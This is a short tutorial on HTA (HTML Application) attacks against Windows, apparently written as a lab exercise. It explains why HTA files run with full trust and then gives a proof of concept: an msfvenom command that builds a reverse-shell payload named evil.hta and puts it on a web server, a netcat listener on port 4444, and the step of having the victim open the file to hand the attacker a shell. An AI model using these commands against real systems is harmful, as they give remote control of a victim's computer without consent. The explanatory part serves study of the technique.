HTA Attack

HTA attack

This type of attack is a simple HTML application that can provide full access to the remote attacker. The usual file extension of an HTA is .hta. An HTA is treated like any executable file with the extension .exe. When executed via mshta.exe (or if the file icon is double-clicked), it runs immediately. When executed remotely via the browser, the user is asked once, before the HTA is downloaded, whether or not to save and run the application; if saved, it can simply be run on demand after that.

What is a HTA File?

A HTA file is usually made up of HTML and script such as JScript or VBScript, much like a normal web page.

However, the difference with HTA files is that they run in full trust mode, with access to features that a normal web page wouldn’t have, such as ActiveX controls usually marked ‘unsafe for scripting’.

This means that if an attacker was to serve a HTA file (for example, via a malicious webpage) and convince the user to click through two warnings, then the attacker could run malicious code on the victim’s computer. All without needing an exploit or bypassing any of the latest and greatest mitigations.

Proof of concept

create shell with mfsvenom in directory /var/www/html

sudo msfvenom -p windows/shell_reverse_tcp LHOST=[ip] LPORT=[port] -f hta-psh -o /var/www/html/evil.hta

Systemctl start apache2

Open listening port with command Nc –lnvp 4444

Open browser in window ova and go to path [kali_ip]/evil.hta then press Run or saving file and open it, Now we got a shell from windows ova .